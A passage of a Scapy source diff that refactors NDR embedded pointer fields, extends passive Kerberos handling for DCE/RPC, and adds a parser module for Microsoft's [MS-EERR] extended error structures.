NDRFullEmbPointerField(NDRFullPointerField): + """ + A NDR Embedded Full pointer. + + Same as NDRFullPointerField with EMBEDDED = True. + """ + + EMBEDDED = True + + class NDRRefEmbPointerField(NDRFullPointerField): """ - A NDR Embedded Reference pointer + A NDR Embedded Reference pointer. + + Same as NDRFullPointerField with EMBEDDED = True and EMBEDDED_REF = True. """ EMBEDDED = True + EMBEDDED_REF = True # Constructed types @@ -1738,7 +1769,7 @@ def rec_check_deferral(self): # If we have a pointer, mark this field as handling deferrance # and make all sub-constructed types not. for f in self.ndr_fields: - if isinstance(f, NDRFullPointerField) and f.deferred: + if isinstance(f, NDRFullPointerField) and f.EMBEDDED: self.handles_deferred = True if isinstance(f, NDRConstructedType): f.rec_check_deferral() @@ -1877,9 +1908,7 @@ class _NDRPacketListField(NDRConstructedType, PacketListField): def __init__(self, name, default, pkt_cls, **kwargs): self.ptr_pack = kwargs.pop("ptr_pack", False) if self.ptr_pack: - self.fld = NDRFullPointerField( - NDRPacketField("", None, pkt_cls), deferred=True - ) + self.fld = NDRFullEmbPointerField(NDRPacketField("", None, pkt_cls)) else: self.fld = NDRPacketField("", None, pkt_cls) PacketListField.__init__(self, name, default, pkt_cls=pkt_cls, **kwargs) @@ -1950,7 +1979,7 @@ class NDRVaryingArray(_NDRPacket): ] -class _NDRVarField(object): +class _NDRVarField: """ NDR Varying Array / String field """ @@ -2070,7 +2099,7 @@ class NDRConformantString(_NDRPacket): ] -class _NDRConfField(object): +class _NDRConfField: """ NDR Conformant Array / String field """ @@ -2241,7 +2270,7 @@ class NDRConfStrLenField(_NDRConfField, _NDRValueOf, StrLenField): class NDRConfStrLenFieldUtf16(_NDRConfField, _NDRValueOf, StrLenFieldUtf16, _NDRUtf16): """ - NDR Conformant StrLenField. + NDR Conformant StrLenFieldUtf16. See NDRConfLenStrField for comment. """ @@ -2261,7 +2290,7 @@ class NDRVarStrLenField(_NDRVarField, StrLenField): class NDRVarStrLenFieldUtf16(_NDRVarField, _NDRValueOf, StrLenFieldUtf16, _NDRUtf16): """ - NDR Varying StrLenField + NDR Varying StrLenFieldUtf16 """ ON_WIRE_SIZE_UTF16 = False @@ -2280,7 +2309,7 @@ class NDRConfVarStrLenFieldUtf16( _NDRConfField, _NDRVarField, _NDRValueOf, StrLenFieldUtf16, _NDRUtf16 ): """ - NDR Conformant Varying StrLenField + NDR Conformant Varying StrLenFieldUtf16 """ ON_WIRE_SIZE_UTF16 = False @@ -2391,14 +2420,14 @@ def __init__(self, name, fmt="I"): super(NDRRecursiveField, self).__init__(name, None, fmt=fmt) def getfield(self, pkt, s): - return NDRFullPointerField( - NDRPacketField("", None, pkt.__class__), deferred=True - ).getfield(pkt, s) + return NDRFullEmbPointerField(NDRPacketField("", None, pkt.__class__)).getfield( + pkt, s + ) def addfield(self, pkt, s, val): - return NDRFullPointerField( - NDRPacketField("", None, pkt.__class__), deferred=True - ).addfield(pkt, s, val) + return NDRFullEmbPointerField(NDRPacketField("", None, pkt.__class__)).addfield( + pkt, s, val + ) # The very few NDR-specific structures @@ -2697,6 +2726,8 @@ def in_pkt(self, pkt): self.sniffsspcontexts[ssp], status = ssp.GSS_Passive( self.sniffsspcontexts[ssp], pkt.auth_verifier.auth_value, + req_flags=GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS + | GSS_C_FLAGS.GSS_C_DCE_STYLE, ) if status == GSS_S_COMPLETE: self.auth_level = DCE_C_AUTHN_LEVEL( diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index bd7d46f4631..9e292dcf7e2 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -4976,20 +4976,37 @@ def GSS_Accept_sec_context( else: raise ValueError("KerberosSSP: Unknown state %s" % repr(Context.state)) - def GSS_Passive(self, Context: CONTEXT, token=None): + def GSS_Passive( + self, + Context: CONTEXT, + token=None, + req_flags: Optional[GSS_S_FLAGS] = GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS, + ): if Context is None: Context = self.CONTEXT(True) Context.passive = True - if Context.state == self.STATE.INIT: - Context, _, status = self.GSS_Accept_sec_context(Context, token) - if status == GSS_S_CONTINUE_NEEDED: + if Context.state == self.STATE.INIT or ( + # In DCE/RPC, there's an extra AP-REP sent from the client. + Context.state == self.STATE.SRV_SENT_APREP + and req_flags & GSS_C_FLAGS.GSS_C_DCE_STYLE + ): + Context, _, status = self.GSS_Accept_sec_context( + Context, token, req_flags=req_flags + ) + if status in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: Context.state = self.STATE.CLI_SENT_APREQ else: Context.state = self.STATE.FAILED return Context, status elif Context.state == self.STATE.CLI_SENT_APREQ: - Context, _, status = self.GSS_Init_sec_context(Context, token) + Context, _, status = self.GSS_Init_sec_context( + Context, token, req_flags=req_flags + ) + if status == GSS_S_COMPLETE: + Context.state = self.STATE.SRV_SENT_APREP + else: + Context.state == self.STATE.FAILED return Context, status # Unknown state. Don't crash though. @@ -5009,6 +5026,12 @@ def GSS_Passive_set_Direction(self, Context: CONTEXT, IsAcceptor=False): ) Context.IsAcceptor = not Context.IsAcceptor + def LegsAmount(self, Context: CONTEXT): + if Context.flags & GSS_C_FLAGS.GSS_C_DCE_STYLE: + return 4 + else: + return 2 + def MaximumSignatureLength(self, Context: CONTEXT): if Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG: # TODO: support DES diff --git a/scapy/layers/msrpce/all.py b/scapy/layers/msrpce/all.py index 89e2baa0e85..6eaf1ac5abf 100644 --- a/scapy/layers/msrpce/all.py +++ b/scapy/layers/msrpce/all.py @@ -24,6 +24,7 @@ _LAYERS = [ # High-level classes "msrpce.msdcom", + "msrpce.mseerr", "msrpce.msnrpc", "msrpce.mspac", # Client / Server diff --git a/scapy/layers/msrpce/msdcom.py b/scapy/layers/msrpce/msdcom.py index 6be74978ddd..4ed6cd221fb 100644 --- a/scapy/layers/msrpce/msdcom.py +++ b/scapy/layers/msrpce/msdcom.py @@ -32,6 +32,7 @@ NDRLongField, NDRPacket, NDRPacketField, + NDRFullEmbPointerField, NDRFullPointerField, NDRConfPacketListField, NDRConfFieldListField, @@ -109,11 +110,10 @@ class InstantiationInfoData(NDRPacket): NDRSignedIntField("fIsSurrogate", 0), NDRIntField("cIID", 0), NDRIntField("instFlag", 0), - NDRFullPointerField( + NDRFullEmbPointerField( NDRConfPacketListField( "pIID", [GUID()], GUID, count_from=lambda pkt: pkt.cIID ), - deferred=True, ), NDRIntField("thisSize", 0), NDRPacketField("clientCOMVersion", COMVERSION(), COMVERSION), @@ -147,15 +147,13 @@ class SpecialPropertiesData(NDRPacket): class InstanceInfoData(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ - NDRFullPointerField(NDRConfVarStrNullFieldUtf16("fileName", ""), deferred=True), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("fileName", "")), NDRIntField("mode", 0), - NDRFullPointerField( + NDRFullEmbPointerField( NDRPacketField("ifdROT", MInterfacePointer(), MInterfacePointer), - deferred=True, ), - NDRFullPointerField( + NDRFullEmbPointerField( NDRPacketField("ifdStg", MInterfacePointer(), MInterfacePointer), - deferred=True, ), ] @@ -168,11 +166,10 @@ class customREMOTE_REQUEST_SCM_INFO(NDRPacket): fields_desc = [ NDRIntField("ClientImpLevel", 0), NDRShortField("cRequestedProtseqs", 0), - NDRFullPointerField( + NDRFullEmbPointerField( NDRConfStrLenFieldUtf16( "pRequestedProtseqs", "", length_from=lambda pkt: pkt.cRequestedProtseqs ), - deferred=True, ), ] @@ -180,14 +177,13 @@ class customREMOTE_REQUEST_SCM_INFO(NDRPacket): class ScmRequestInfoData(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ - NDRFullPointerField(NDRIntField("pdwReserved", 0), deferred=True), - NDRFullPointerField( + NDRFullEmbPointerField(NDRIntField("pdwReserved", 0)), + NDRFullEmbPointerField( NDRPacketField( "remoteRequest", customREMOTE_REQUEST_SCM_INFO(), customREMOTE_REQUEST_SCM_INFO, ), - deferred=True, ), ] @@ -202,13 +198,11 @@ class ActivationContextInfoData(NDRPacket): NDRSignedIntField("bReserved1", 0), NDRIntField("dwReserved1", 0), NDRIntField("dwReserved2", 0), - NDRFullPointerField( + NDRFullEmbPointerField( NDRPacketField("pIFDClientCtx", MInterfacePointer(), MInterfacePointer), - deferred=True, ), - NDRFullPointerField( + NDRFullEmbPointerField( NDRPacketField("pIFDPrototypeCtx", MInterfacePointer(), MInterfacePointer), - deferred=True, ), ] @@ -219,8 +213,8 @@ class ActivationContextInfoData(NDRPacket): class LocationInfoData(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ - NDRFullPointerField( - NDRConfVarStrNullFieldUtf16("machineName", ""), deferred=True + NDRFullEmbPointerField( + NDRConfVarStrNullFieldUtf16("machineName", ""), ), NDRIntField("processId", 0), NDRIntField("apartmentId", 0), @@ -235,8 +229,8 @@ class COSERVERINFO(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ NDRIntField("dwReserved1", 0), - NDRFullPointerField(NDRConfVarStrNullFieldUtf16("pwszName", ""), deferred=True), - NDRFullPointerField(NDRIntField("pdwReserved", 0), deferred=True), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("pwszName", "")), + NDRFullEmbPointerField(NDRIntField("pdwReserved", 0)), NDRIntField("dwReserved2", 0), ] @@ -245,10 +239,10 @@ class SecurityInfoData(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ NDRIntField("dwAuthnFlags", 0), - NDRFullPointerField( - NDRPacketField("pServerInfo", COSERVERINFO(), COSERVERINFO), deferred=True + NDRFullEmbPointerField( + NDRPacketField("pServerInfo", COSERVERINFO(), COSERVERINFO), ), - NDRFullPointerField(NDRIntField("pdwReserved", 0), deferred=True), + NDRFullPointerField(NDRIntField("pdwReserved", 0)), ] @@ -282,9 +276,8 @@ class customREMOTE_REPLY_SCM_INFO(NDRPacket): ALIGNMENT = (8, 8) fields_desc = [ NDRLongField("Oxid", 0), - NDRFullPointerField( + NDRFullEmbPointerField( NDRPacketField("pdsaOxidBindings", DUALSTRINGARRAY(), DUALSTRINGARRAY), - deferred=True, ), NDRPacketField("ipidRemUnknown", GUID(), GUID), NDRIntField("authnHint", 0), @@ -295,14 +288,13 @@ class customREMOTE_REPLY_SCM_INFO(NDRPacket): class ScmReplyInfoData(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ - NDRFullPointerField(NDRIntField("pdwReserved", 0), deferred=True), - NDRFullPointerField( + NDRFullEmbPointerField(NDRIntField("pdwReserved", 0)), + NDRFullEmbPointerField( NDRPacketField( "remoteReply", customREMOTE_REPLY_SCM_INFO(), customREMOTE_REPLY_SCM_INFO, ), - deferred=True, ), ] @@ -314,29 +306,26 @@ class PropsOutInfo(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ NDRIntField("cIfs", 0), - NDRFullPointerField( + NDRFullEmbPointerField( NDRConfPacketListField( "piid", [GUID()], GUID, count_from=lambda pkt: pkt.cIfs ), - deferred=True, ), - NDRFullPointerField( + NDRFullEmbPointerField( NDRConfFieldListField( "phresults", [], NDRSignedIntField("", 0), count_from=lambda pkt: pkt.cIfs, ), - deferred=True, ), - NDRFullPointerField( + NDRFullEmbPointerField( NDRConfPacketListField( "ppIntfData", [MInterfacePointer()], MInterfacePointer, count_from=lambda pkt: pkt.cIfs, ), - deferred=True, ), ] @@ -353,19 +342,17 @@ class CustomHeader(NDRPacket): NDRIntField("destCtx", 0), NDRIntField("cIfs", 0), NDRPacketField("classInfoClsid", GUID(), GUID), - NDRFullPointerField( + NDRFullEmbPointerField( NDRConfPacketListField( "pclsid", [GUID()], GUID, count_from=lambda pkt: pkt.cIfs ), - deferred=True, ), - NDRFullPointerField( + NDRFullEmbPointerField( NDRConfFieldListField( "pSizes", [], NDRIntField("", 0), count_from=lambda pkt: pkt.cIfs ), - deferred=True, ), - NDRFullPointerField(NDRIntField("pdwReserved", 0), deferred=True), + NDRFullEmbPointerField(NDRIntField("pdwReserved", 0)), ] diff --git a/scapy/layers/msrpce/mseerr.py b/scapy/layers/msrpce/mseerr.py new file mode 100644 index 00000000000..8d65ba215df --- /dev/null +++ b/scapy/layers/msrpce/mseerr.py @@ -0,0 +1,656 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +[MS-EERR] ExtendedError Remote Data Structure +""" + +# Wireshark does not know how to read this ! + +import uuid +from enum import IntEnum + +from scapy.fields import StrFixedLenField, UTCTimeField +from scapy.layers.dcerpc import ( + DceRpc5Fault, + DceRpc5BindNak, + NDRConfPacketListField, + NDRConfStrLenField, + NDRConfStrLenFieldUtf16, + NDRFullEmbPointerField, + NDRInt3264EnumField, + NDRIntField, + NDRPacket, + NDRPacketField, + NDRRecursiveField, + NDRSerializeType1PacketField, + NDRShortField, + NDRSignedShortField, + NDRUnionField, + NDRLongField, +) +from scapy.layers.smb2 import STATUS_ERREF +from scapy.packet import Packet, bind_layers + +# [MS-EERR] structures + + +class EEAString(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRSignedShortField("nLength", None, size_of="pString"), + NDRFullEmbPointerField( + NDRConfStrLenField("pString", "", size_is=lambda pkt: pkt.nLength), + ), + ] + + +class EEUString(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRSignedShortField("nLength", None, size_of="pString"), + NDRFullEmbPointerField( + NDRConfStrLenFieldUtf16("pString", "", size_is=lambda pkt: pkt.nLength), + ), + ] + + +class BinaryEEInfo(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRSignedShortField("nSize", None, size_of="pBlob"), + NDRFullEmbPointerField( + NDRConfStrLenField("pBlob", "", size_is=lambda pkt: pkt.nSize), + ), + ] + + +class ExtendedErrorParamTypesInternal(IntEnum): + eeptiAnsiString = 1 + eeptiUnicodeString = 2 + eeptiLongVal = 3 + eeptiShortValue = 4 + eeptiPointerValue = 5 + eeptiNone = 6 + eeptiBinary = 7 + + +class ExtendedErrorParam(NDRPacket): + ALIGNMENT = (8, 8) + fields_desc = [ + NDRInt3264EnumField("Type", 0, ExtendedErrorParamTypesInternal), + NDRUnionField( + [ + ( + NDRPacketField("value", EEAString(), EEAString), + ( + (lambda pkt: getattr(pkt, "Type", None) == 1), + (lambda _, val: val.tag == 1), + ), + ), + ( + NDRPacketField("value", EEUString(), EEUString), + ( + (lambda pkt: getattr(pkt, "Type", None) == 2), + (lambda _, val: val.tag == 2), + ), + ), + ( + NDRIntField("value", 0), + ( + (lambda pkt: getattr(pkt, "Type", None) == 3), + (lambda _, val: val.tag == 3), + ), + ), + ( + NDRSignedShortField("value", 0), + ( + (lambda pkt: getattr(pkt, "Type", None) == 4), + (lambda _, val: val.tag == 4), + ), + ), + ( + NDRLongField("value", 0), + ( + (lambda pkt: getattr(pkt, "Type", None) == 5), + (lambda _, val: val.tag == 5), + ), + ), + ( + StrFixedLenField("value", "", length=0), + ( + (lambda pkt: getattr(pkt, "Type", None) == 6), + (lambda _, val: val.tag == 6), + ), + ), + ( + NDRPacketField("value", BinaryEEInfo(), BinaryEEInfo), + ( + (lambda pkt: getattr(pkt, "Type", None) == 7), + (lambda _, val: val.tag == 7), + ), + ), + ], + StrFixedLenField("value", "", length=0), + align=(2, 8), + switch_fmt=("H", "I"), + ), + ] + + +class EEComputerNamePresent(IntEnum): + eecnpPresent = 1 + eecnpNotPresent = 2 + + +class EEComputerName(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRInt3264EnumField("Type", 0, EEComputerNamePresent), + NDRUnionField( + [ + ( + NDRPacketField("value", EEUString(), EEUString), + ( + (lambda pkt: getattr(pkt, "Type", None) == 1), + (lambda _, val: val.tag == 1), + ), + ), + ( + StrFixedLenField("value", "", length=0), + ( + (lambda pkt: getattr(pkt, "Type", None) == 2), + (lambda _, val: val.tag == 2), + ), + ), + ], + StrFixedLenField("value", "", length=0), + align=(2, 8), + switch_fmt=("H", "I"), + ), + ] + + +class ExtendedErrorInfo(NDRPacket): + ALIGNMENT = (8, 8) + DEPORTED_CONFORMANTS = ["Params"] + fields_desc = [ + NDRRecursiveField("Next"), + NDRPacketField("ComputerName", EEComputerName(), EEComputerName), + NDRIntField("ProcessID", 0), + NDRLongField("TimeStamp", 0), + NDRIntField("GeneratingComponent", 0), + NDRIntField("Status", 0), + NDRShortField("DetectionLocation", 0), + NDRShortField("Flags", 0), + NDRSignedShortField("nLen", None, size_of="Params"), + NDRConfPacketListField( + "Params", + [], + ExtendedErrorParam, + size_is=lambda pkt: pkt.nLen, + conformant_in_struct=True, + ), + ] + + +# Encapsulation packets + +# https://learn.microsoft.com/en-us/windows/win32/rpc/understanding-extended-error-information + +EERR_GENERATING_COMPONENT = { + # The component owning the manager routine for the particular RPC call + 1: "Application", + # The RPC run time + 2: "Runtime", + # The security provider for this call. + 3: "Security Provider", + # The NPFS file system + 4: "NPFS", + # The Redirector + 5: "RDR", + # The named pipe system. + # This can be either NPFS or RDR, but in many cases the RPC run time + # does not know who performed the requested the operation, and in such + # cases NMP is returned. + 6: "NMP", + # The IO system or a driver used by the IO system. + # This can be either NPFS, RDR, or a Winsock provider. + 7: "IO", + # The Winsock provider + 8: "Winsock", + # The Authorization APIs. + 9: "Authz code", + # The Local Procedure Call facility. + 10: "LPC", +} + +EERR_FLAGS = { + 1: "EEInfoPreviousRecordsMissing", + 2: "EEInfoNextRecordsMissing", +} + +# https://learn.microsoft.com/en-us/windows/win32/rpc/extended-error-information-detection-locations + +EERR_DETECTION_LOCATIONS = { + 10: "DealWithLRPCRequest10", + 11: "DealWithLRPCRequest20", + 12: "WithLRPCRequest30", + 13: "WithLRPCRequest40", + 20: "LrpcMessageToRpcMessage10", + 21: "LrpcMessageToRpcMessage20", + 22: "LrpcMessageToRpcMessage30", + 30: "DealWithRequestMessage10", + 31: "DealWithRequestMessage20", + 32: "DealWithRequestMessage30", + 40: "CheckSecurity10", + 50: "DealWithBindMessage10", + 51: "DealWithBindMessage20", + 52: "DealWithBindMessage30", + 53: "DealWithBindMessage40", + 54: "DealWithBindMessage50", + 55: "DealWithBindMessage60", + 60: "FindServerCredentials10", + 61: "FindServerCredentials20", + 62: "FindServerCredentials30", + 70: "AcceptFirstTime10", + 71: "AcceptThirdLeg10", + 72: "AcceptThirdLeg20", + 73: "AcceptFirstTime20", + 74: "AcceptThirdLeg40", + 80: "AssociationRequested10", + 81: "AssociationRequested20", + 82: "AssociationRequested30", + 90: "CompleteSecurityToken10", + 91: "CompleteSecurityToken20", + 100: "AcquireCredentialsForClient10", + 101: "AcquireCredentialsForClient20", + 102: "AcquireCredentialsForClient30", + 110: "InquireDefaultPrincName10", + 111: "InquireDefaultPrincName20", + 120: "SignOrSeal10", + 130: "VerifyOrUnseal10", + 131: "VerifyOrUnseal20", + 140: "InitializeFirstTime10", + 141: "InitializeFirstTime20", + 142: "InitializeFirstTime30", + 150: "InitializeThirdLeg10", + 151: "InitializeThirdLeg20", + 152: "InitializeThirdLeg30", + 153: "InitializeThirdLeg40", + 154: "InitializeThirdLeg50", + 155: "InitializeThirdLeg60", + 160: "ImpersonateClient10", + 170: "DispatchToStub10", + 171: "DispatchToStub20", + 180: "DispatchToStubWorker10", + 181: "DispatchToStubWorker20", + 182: "DispatchToStubWorker30", + 183: "DispatchToStubWorker40", + 190: "NMPOpen10", + 191: "NMPOpen20", + 192: "NMPOpen30", + 193: "NMPOpen40", + 200: "NMPSyncSend10", + 210: "NMPSyncSendReceive10", + 220: "NMPSyncSendReceive20", + 221: "NMPSyncSendReceive30", + 230: "COSend10", + 240: "COSubmitRead10", + 250: "COSubmitSyncRead10", + 251: "COSubmitSyncRead20", + 260: "COSyncRecv10", + 270: "WSCheckForShutdowns10", + 271: "WSCheckForShutdowns20", + 272: "WSCheckForShutdowns30", + 273: "WSCheckForShutdowns40", + 274: "WSCheckForShutdowns50", + 280: "WSSyncSend10", + 281: "WSSyncSend20", + 282: "WSSyncSend30", + 290: "WSSyncRecv10", + 291: "WSSyncRecv20", + 292: "WSSyncRecv30", + 300: "WSServerListenCommon10", + 301: "WSServerListenCommon20", + 302: "WSServerListenCommon30", + 310: "WSOpen10", + 311: "WSOpen20", + 312: "WSOpen30", + 313: "WSOpen40", + 314: "WSOpen50", + 315: "WSOpen60", + 316: "WSOpen70", + 317: "WSOpen80", + 318: "WSOpen90", + 320: "NextAddress10", + 321: "NextAddress20", + 322: "NextAddress30", + 323: "NextAddress40", + 330: "WSBind10", + 331: "WSBind20", + 332: "WSBind30", + 333: "WSBind40", + 334: "WSBind50", + 335: "WSBind45", + 340: "IPBuildAddressVector10", + 350: "GetStatusForTimeout10", + 351: "GetStatusForTimeout20", + 360: "OSF_CCONNECTION__SendFragment10", + 361: "OSF_CCONNECTION__SendFragment20", + 370: "OSF_CCALL__ReceiveReply10", + 371: "OSF_CCALL__ReceiveReply20", + 380: "OSF_CCALL__FastSendReceive10", + 381: "OSF_CCALL__FastSendReceive20", + 382: "OSF_CCALL__FastSendReceive30", + 390: "LRPC_BINDING_HANDLE__AllocateCCall10", + 391: "LRPC_BINDING_HANDLE__AllocateCCall20", + 400: "LRPC_ADDRESS__ServerSetupAddress10", + 410: "LRPC_ADDRESS__HandleInvalidAssociationReference10", + 420: "InitializeAuthzSupportIfNecessary10", + 421: "InitializeAuthzSupportIfNecessary20", + 430: "CreateDummyResourceManagerIfNecessary10", + 431: "CreateDummyResourceManagerIfNecessary20", + 440: "LRPC_SCALL__GetAuthorizationContext10", + 441: "LRPC_SCALL__GetAuthorizationContext20", + 442: "LRPC_SCALL__GetAuthorizationContext30", + 450: "SCALL__DuplicateAuthzContext10", + 460: "SCALL__CreateAndSaveAuthzContextFromToken10", + 470: "SECURITY_CONTEXT__GetAccessToken10", + 471: "SECURITY_CONTEXT__GetAccessToken20", + 480: "OSF_SCALL__GetAuthorizationContext10", + 500: "EpResolveEndpoint10", + 501: "EpResolveEndpoint20", + 510: "OSF_SCALL__GetBuffer10", + 520: "LRPC_SCALL__ImpersonateClient10", + 530: "SetMaximumLengths10", + 540: "LRPC_CASSOCIATION__ActuallyDoBinding10", + 541: "LRPC_CASSOCIATION__ActuallyDoBinding20", + 542: "LRPC_CASSOCIATION__ActuallyDoBinding30", + 543: "LRPC_CASSOCIATION__ActuallyDoBinding40", + 550: "LRPC_CASSOCIATION__CreateBackConnection10", + 551: "LRPC_CASSOCIATION__CreateBackConnection20", + 552: "LRPC_CASSOCIATION__CreateBackConnection30", + 560: "LRPC_CASSOCIATION__OpenLpcPort10", + 561: "LRPC_CASSOCIATION__OpenLpcPort20", + 562: "LRPC_CASSOCIATION__OpenLpcPort30", + 563: "LRPC_CASSOCIATION__OpenLpcPort40", + 570: "RegisterEntries10", + 571: "RegisterEntries20", + 580: "NDRSContextUnmarshall2_10", + 581: "NDRSContextUnmarshall2_20", + 582: "NDRSContextUnmarshall2_30", + 583: "NDRSContextUnmarshall2_40", + 584: "NDRSContextUnmarshall2_50", + 590: "NDRSContextMarshall2_10", + 600: "WinsockDatagramSend10", + 601: "WinsockDatagramSend20", + 610: "WinsockDatagramReceive10", + 620: "WinsockDatagramSubmitReceive10", + 630: "DG_CCALL__CancelAsyncCall10", + 640: "DG_CCALL__DealWithTimeout10", + 641: "DG_CCALL__DealWithTimeout20", + 642: "DG_CCALL__DealWithTimeout30", + 650: "DG_CCALL__DispatchPacket10", + 660: "DG_CCALL__ReceiveSinglePacket10", + 661: "DG_CCALL__ReceiveSinglePacket20", + 662: "DG_CCALL__ReceiveSinglePacket30", + 670: "WinsockDatagramResolve10", + 680: "WinsockDatagramCreate10", + 690: "TCP_QueryLocalAddress10", + 691: "TCP_QueryLocalAddress20", + 700: "OSF_CASSOCIATION__ProcessBindAckOrNak10", + 701: "OSF_CASSOCIATION__ProcessBindAckOrNak20", + 710: "MatchMsPrincipalName10", + 720: "CompareRdnElement10", + 730: "MatchFullPathPrincipalName10", + 731: "MatchFullPathPrincipalName20", + 732: "MatchFullPathPrincipalName30", + 733: "MatchFullPathPrincipalName40", + 734: "MatchFullPathPrincipalName50", + 740: "RpcCertGeneratePrincipalName10", + 741: "RpcCertGeneratePrincipalName20", + 742: "RpcCertGeneratePrincipalName30", + 750: "RpcCertVerifyContext10", + 751: "RpcCertVerifyContext20", + 752: "RpcCertVerifyContext30", + 753: "RpcCertVerifyContext40", + 761: "OSF_BINDING_HANDLE__NegotiateTransferSyntax10", + # END OF DOC + # below is reverse engineered + 770: "RpcpErrorAddRecord", + 780: "RpcpLookupAccountSid", + 800: "OSF_SCONNECTION__AcceptFirstTime", + 810: "OSF_SCONNECTION__AcceptThirdLeg", + 820: "OSF_BINDING_HANDLE__AcquireTokenForTransport", + 821: "OSF_BINDING_HANDLE__AcquireCredentialsForTokenIfNecessary", + 835: "LRPC_CASSOCIATION__CompleteBind", + 840: "LRPC_BASE_BINDING_HANDLE__BaseBindingCopy", + 860: "LRPC_BASE_BINDING_HANDLE__SetAuthInformation", + 861: "LRPC_BASE_BINDING_HANDLE__SetAuthInformation", + 862: "LRPC_BASE_BINDING_HANDLE__SetAuthInformation", + 864: "LRPC_BASE_BINDING_HANDLE__SetAuthInformation", + 865: "LRPC_BASE_BINDING_HANDLE__SetAuthInformation", + 867: "LRPC_BASE_BINDING_HANDLE__SetAuthInformation", + 868: "LRPC_BASE_BINDING_HANDLE__SetAuthInformation", + 869: "LRPC_BASE_BINDING_HANDLE__SetAuthInformation", + 880: "LRPC_BASE_BINDING_HANDLE__ResolveEndpoint", + 881: "LRPC_BASE_BINDING_HANDLE__ResolveEndpoint", + 882: "LRPC_BASE_BINDING_HANDLE__ResolveEndpoint", + 883: "LRPC_BASE_BINDING_HANDLE__ResolveEndpoint", + 900: "LRPC_BASE_BINDING_HANDLE__SubmitResolveEndpointRequest", + 910: "LRPC_BASE_BINDING_HANDLE__NormalizeServerSid", + 912: "LRPC_BASE_BINDING_HANDLE__NormalizeServerSid", + 913: "LRPC_BASE_BINDING_HANDLE__NormalizeServerSid", + 920: "LRPC_BASE_BINDING_HANDLE__DriveStateForward", + 921: "LRPC_BASE_BINDING_HANDLE__DriveStateForward", + 930: "LRPC_BINDING_HANDLE__PrepareBindingHandle", + 931: "LRPC_BINDING_HANDLE__PrepareBindingHandle", + 946: "?0LRPC_FAST_BINDING_HANDLE", + 950: "LRPC_BASE_CCALL__AsyncReceive", + 960: "LRPC_BINDING_HANDLE__NegotiateTransferSyntax", + 972: "LRPC_BASE_CCALL__UnpackResponse", + 974: "LRPC_BASE_CCALL__UnpackResponse", + 978: "LRPC_BASE_CCALL__UnpackResponse", + 980: "LRPC_BASE_CCALL__HandleReply", + 990: "LRPC_BASE_CCALL__HandleReply", + 1000: "LRPC_BASE_CCALL__AlpcSend", + 1010: "LRPC_BASE_CCALL__DoSendReceive", + 1020: "LRPC_BASE_CCALL__GetBuffer", + 1030: "LRPC_BASE_CCALL__DoAsyncSend", + 1040: "LRPC_BIND_CCALL__NotifyBHStateChange", + 1050: "LRPC_BIND_CCALL__AttemptRetry", + 1060: "CLIENT_IO_PROVIDER__SyncWait", + 1070: "CLIENT_IO_PROVIDER__Register", + 1100: "AlpcAllocateSectionAndView", + 1120: "CaptureThreadToken", + 1140: "RpcpDuplicateTokenEx", + 1150: "GetMachineAccountSidWorker", + 1160: "LRPC_BASE_BINDING_HANDLE__DriveStateForward", + 1170: "LPC_NORMALIZED_SID__IterateAndVerify", + 1100: "AlpcAllocateSectionAndView", + 1120: "CaptureThreadToken", + 1140: "RpcpDuplicateTokenEx", + 1150: "GetMachineAccountSidWorker", + 1160: "LRPC_BASE_BINDING_HANDLE__DriveStateForward", + 1170: "LPC_NORMALIZED_SID__IterateAndVerify", + 1171: "LPC_NORMALIZED_SID__IterateAndVerify", + 1180: "LRPC_SASSOCIATION__GetClientName", + 1190: "LRPC_SASSOCIATION__AddBinding", + 1200: "AlpcAllocateView", + 1210: "LRPC_SASSOCIATION__ImpersonateClient", + 1215: "LRPC_SASSOCIATION__ImpersonateClientContainer", + 1230: "LRPC_SCALL__SaveClientToken", + 1232: "LRPC_SCALL__SaveClientToken", + 1240: "LRPC_SCONTEXT__GetUserNameW", + 1260: "LRPC_SCONTEXT__LookupUser", + 1270: "LRPC_BINDING_HANDLE__NegotiateTransferSyntax", + 1280: "LRPC_SCALL__SendReceive", + 1290: "LRPC_CCALL__HandleCallbackSequence", + 1300: "LRPC_SCALL__QueueOrDispatchCall", + 1310: "LRPC_ADDRESS__GetCurrentModifiedId", + 1320: "RPC_INTERFACE__DoSecurityCallbackHelper", + 1321: "RPC_INTERFACE__DoSecurityCallbackHelper", + 1322: "RPC_INTERFACE__DoSecurityCallbackHelper", + 1324: "RPC_INTERFACE__EnforceInterfaceSecurityDescriptor", + 1325: "RPC_INTERFACE__EnforceInterfaceSecurityDescriptor", + 1326: "RPC_INTERFACE__EnforceInterfaceSecurityDescriptor", + 1330: "SCALL__CompleteAsyncSecurityCallback", + 1340: "LRPC_BASE_CCALL__ReallocPipeBuffer", + 1360: "LRPC_ADDRESS__GetClientSid", + 1440: "RpcpErrorAddRecord", + 1441: "RpcpErrorAddRecord", + 1442: "TCPOrHTTP_Open", + 1450: "I_RpcRecordCalloutFailure", + 1451: "RpcpErrorAddRecord", + 1452: "I_RpcRecordCalloutFailure", + 1460: "OSF_CCONNECTION__SendBindPacket", + 1461: "OSF_CCONNECTION__SendBindPacket", + 1462: "OSF_CCONNECTION__SendBindPacket", + 1463: "OSF_CCONNECTION__SendBindPacket", + 1464: "OSF_CCONNECTION__SendBindPacket", + 1465: "OSF_CCONNECTION__SendBindPacket", + 